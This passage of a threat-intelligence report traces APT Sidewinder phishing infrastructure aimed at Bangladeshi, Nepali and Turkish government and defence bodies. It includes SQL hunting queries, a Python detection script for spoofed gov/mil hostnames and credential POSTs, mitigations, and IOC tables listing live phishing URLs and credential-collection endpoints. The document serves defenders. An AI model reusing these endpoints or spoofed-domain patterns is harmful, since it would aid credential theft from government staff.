Figure 10Figure 10. Phishing URLs related to “mailbox-inbox-bd[.]com” using Hunt.io Intelligence

Both mailbox3-inbox1-bd[.]com and mailbox-inbox-bd[.]com resolves to the same IP address 146.70.118.226, suggesting they are part of the same phishing infrastructure operated by a common threat actor.

Continuing the infrastructure hunt, a query using the URL pattern netlify.app/?pdf= revealed a new phishing page impersonating DGFI (Directorate General of Forces Intelligence), Bangladesh's military intelligence agency.

SELECT 
    *
FROM
    crawler
WHERE
    url LIKE '%netlify.app/?pdf=%'
AND url LIKE '%gov-bd%'
AND timestamp gt '2025-01-01'

                
Copy

Output:

Figure 11Figure 11. SQL query to hunt for similar URL Pattern "%netlify.app/?pdf=%" which is repeatedly seen in observed URLs

The inclusion of a .gov.bd email in the query string indicates a successful spear-phishing attempt:

https://mail-dgfi-gov-bd-accounts-file-data-d.netlify.app/?pdf=ealb.gso2.protocol@dgfi.gov.bd

Using the URL mailbox-inbox-bd.com in the body field, two additional phishing URLs were identified, both following the same Zimbra-themed lure and targeting sensitive Bangladeshi government entities:

SELECT 
    *
FROM
    crawler
WHERE
    body LIKE '%mailbox-inbox-bd.com%'
AND timestamp gt '2025-04-01'

                
Copy

Output:

Figure 12Figure 12. SQL Query for searching similar URLs with a POST Request to mailbox-inbox-bd[.]com

One spoofed the National Webmail Portal (mail.gov.bd) using a Zimbra-based lure, while the other impersonated the Bangladesh Police webmail login, both exfiltrating credentials via the attacker-controlled domain mailbox-inbox-bd.com

URLsTitlePOST Request
https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXzZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/gov.ph
https://webmail.police.gov.bd.updatemind52.com/dPrSJhFPZimbra Web Client Sign Inhttps://mailbox-inbox-bd.com/pol/pol3.php
#Target CountryDepartment/EntityDescription
1BangladeshNational Webmail PortalPhishing site spoofing mail.gov.bd, with Zimbra lure and backend at mailbox-inbox-bd.com/gov.ph.
2BangladeshBangladesh PoliceSpoofed Police webmail login at webmail.police.gov.bd, using mailbox-inbox-bd.com/pol/pol3.php to exfiltrate credentials.

Attribution and Overlaps

The Sidewinder APT group continues to aggressively target government and defense sectors across South Asia, particularly Bangladesh, Sri Lanka, Nepal, and Pakistan. Recent phishing infrastructure uncovered in our hunt includes domains such as updatemind52.com, netlify.app, and pages.dev, which were designed to mimic official portals like mail.gov.bd, police.gov.bd, and dgdp.gov.bd. These domains were used to host credential-harvesting pages with highly convincing templates, some directly impersonating Zimbra Web Client interfaces.

As shown in the Sidewinder Attack by @SecAI_AI, domains like mail-mod-gov-bd-account-data-file[.]netlify[.]app and phishing URLs such as hxxps://mails.mofa.gov.np.updatemaster[.]info/mail/?_task=login highlight the group's tactic of chaining legitimate-looking subdomains with deceptive second-level domains (e.g., updatemaster[.]info).

Figure 13. APT Sidewinder attribution for "updatemaster[.]info" and mail-mod-gov-bd-account-data-file[.]netlify[.]app from X post

These patterns precisely align with our hunt, where we identified three domains: mail.gov.bd.account.file.updatemind52[.]com, webmail.police.gov.bd.updatemind52[.]com, and dgdp.cloud.secured.file.updatemind52.com. Both the naming format and the use of attacker-controlled parent domains like updatemind52.com confirm the replication of Sidewinder's infrastructure across campaigns.

The second Sidewinder attack by @blackorbird presents additional context, displaying a phishing domain mail-defence-lk-session-out.pages[.]dev used to mimic the Sri Lankan Ministry of Defence. This mirrors the domains we uncovered, such as mail-baf-mil-bd-account-data-files-document.pages.dev and mail-aselsans-com-tr-account-files-da.netlify.app, all hosted on Netlify or Pages.dev.

Figure 14. APT Sidewinder attribution for "netlify[.]app" from X post showing reuse of similar infrastructure

The screenshots in the tweet show the reuse of visual elements like Zimbra login forms and official document previews, matching the behavior in our phishing samples. This consistent use of static site platforms, fake government-themed URLs, and credential-stealing POST methods reflects a broader infrastructure strategy by Sidewinder, aligning with patterns we’ve observed in prior campaigns.

Mitigation Strategies

  • Detect .php phishing pages served from domains that spoof military or gov.bd keywords.

  • Block Netlify-hosted spoofed domains such as *.netlify.app sites mimicking Bangladeshi government or military services.

  • Enforce MFA on all externally accessible services, especially webmail, VPNs, and government portals.

  • Monitor DNS resolutions to *.netlify.app and *.pages.dev domains whose names contain gov, mil, or army patterns.

  • Flag HTTP requests with Zimbra login paths or anomalous User-Agent strings.

  • Security teams can write detections for unusual Zimbra login paths combined with unexpected HTTP POST behavior to external domains.
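As an added example (not code from the report or from Hunt.io), the following Python check implements the two detection ideas above together with the naming pattern described under Attribution and Overlaps: gov/mil-themed hostnames on static-site hosts or chained under an unrelated attacker-controlled parent domain, and a cross-origin credential POST leaving such a page. The proxy record format, the token lists, and the crude eTLD+1 helper are assumptions; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit
STATIC_HOSTS = {"netlify.app", "pages.dev"}           # platforms abused in the report
SPOOF_TOKENS = {"gov", "mil", "army", "mod", "police", "dgdp", "dgfi"}
CC_SLD = {"gov", "mil", "com", "co", "org", "edu"}     # second-level labels, e.g. gov.bd, com.tr
CHAINED = re.compile(r"(^|\.)(gov|mil)\.[a-z]{2}(\.|$)")  # "gov.bd" buried inside a subdomain

def registrable_domain(host):  # crude eTLD+1; assumption: no public-suffix list offline
    p = host.lower().strip(".").split(".")
    if len(p) >= 3 and p[-2] in CC_SLD and len(p[-1]) == 2:
        return ".".join(p[-3:])
    return ".".join(p[-2:])

def suspicious_host(host):
    """Reason string when subdomain labels impersonate a gov/mil site, else None."""
    host = host.lower()
    root = registrable_domain(host)
    sub = host[: len(host) - len(root)].rstrip(".")   # everything left of the root
    hits = sorted(set(re.split(r"[.-]", sub)) & SPOOF_TOKENS)  # legit mail.gov.bd: no hits
    if hits and root in STATIC_HOSTS:
        return f"{host}: gov/mil tokens {hits} on static-site host {root}"
    if hits and CHAINED.search(sub):
        return f"{host}: official domain chained under attacker parent {root}"
    return None

def suspicious_post(method, host, path, referer):
    """Cross-origin POST (the credential submission) leaving a spoofed login page."""
    ref_host = urlsplit(referer).hostname or ""        # referer "-" yields no host
    why = suspicious_host(ref_host) if method == "POST" else None
    if why and registrable_domain(host) != registrable_domain(ref_host):
        return f"credential POST to {host}{path} from {ref_host} ({why})"
    return None

# Constructed proxy records "<time> <method> <host> <path> <referer>" (not real logs)
LOGS = [
    "2025-04-10T08:01:12Z GET mail-mod-gov-bd-account-conf-files.netlify.app /?pdf= -",
    "2025-04-10T08:01:40Z POST mailbox3-inbox1-bd.com /2135.php https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf=",
    "2025-04-10T09:15:02Z POST mail.gov.bd / https://mail.gov.bd/",
    "2025-04-10T09:20:55Z GET docs.netlify.app /guide/ -",
]

def scan(lines):  # run both checks over proxy records and return the alert strings
    alerts = []
    for line in lines:
        _, method, host, path, referer = line.split(" ", 4)
        for why in (suspicious_host(host), suspicious_post(method, host, path, referer)):
            if why:
                alerts.append(why)
    return alerts
```

Running scan(LOGS) yields two alerts: the spoofed Netlify hostname and the cross-origin POST to the collector, while the genuine mail.gov.bd login and an unrelated Netlify site stay quiet.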

Proactively mapping attacker infrastructure remains one of the most effective ways to detect and stop threats like these before they escalate.

Conclusion

This investigation began with a phishing lure targeting Nepal's Ministry of Defense. Through infrastructure pivoting and domain analysis, the campaign's scope expanded to Bangladesh and Turkey, revealing a coordinated set of phishing attacks against government and military entities.

The consistent use of Netlify and Pages.dev, combined with centralized credential collection servers and cloned login portals, points to a sustained and scalable campaign. Attribution indicators and infrastructure overlaps reinforce previous links to APT Sidewinder.

Tracking infrastructure reuse across campaigns like this is critical. It gives defenders a practical advantage, helping detect threats early, enriching IOCs, and reducing attacker dwell time across targeted government and military environments.

APT Sidewinder Indicators of Compromise (IOCs)

URL | Title | POST Request
https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXz | Zimbra Web Client Sign In | https://mailbox-inbox-bd.com/gov.ph
https://webmail.police.gov.bd.updatemind52.com/dPrSJhFP | Zimbra Web Client Sign In | https://mailbox-inbox-bd.com/pol/pol3.php
https://dgdp.cloud.secured.file.updatemind52.com/FOWSMNcl | Dgdp Secured File System | https://mailbox-inbox-bd.com/dgdp/109y.php
https://dgdp-account-file-data-doc-procuremen.netlify.app/ | Dgdp Secured File System | https://mailbox3-inbox1-bd.com/dgdp12.php
https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf= | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://mail-baf-mil-bd-account-data-files-document.pages.dev/ | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://idef-2025-conf-data-file-tr-account-d.netlify.app/ | IDEF Secured File System | https://mailbox3-inbox1-bd.com/idef.php
https://mail-aselsans-com-tr-account-files-da.netlify.app/error.html?pdf=mail.aselsan.com.tr | | https://mailbox3-inbox1-bd.com/asln/2.php
https://drive-rokectsaans-com-tr-account-file.netlify.app/ | Roketsan Drive | https://mailbox3-inbox1-bd.com/idef.php
https://idef2025-com-tr-files-drive-account.netlify.app/ | IDEF Secured File System | https://mailbox3-inbox1-bd.com/idef11.php
https://mail-bof-gov-file-account-conf-files.netlify.app/?pdf= | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://drive-roketsans-com-tr-account-files.netlify.app/ | Roketsan Drive | https://mailbox3-inbox1-bd.com/idef.php
https://mail-mod-gov-np-account-file-data[.]netlify[.]app/bof.html | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://mail-dgfi-gov-bd-accounts-file-data-d.netlify.app/?pdf=ealb.gso2.protocol@dgfi.gov.bd | Zimbra Web Client Sign In | N/A

Additional IOCs

IOC | Type | Description
mailbox3-inbox1-bd.com | Domain | Credential exfiltration endpoint used in POST requests from multiple spoofed government and defense login portals.
mailbox-inbox-bd.com | Domain | Alternate credential collection domain, also receiving POST requests from phishing pages mimicking Zimbra and secured file systems.
146.70.118.226 | IP Address | Hosting infrastructure linked to the Sidewinder phishing campaign, likely associated with the above credential exfiltration domains.
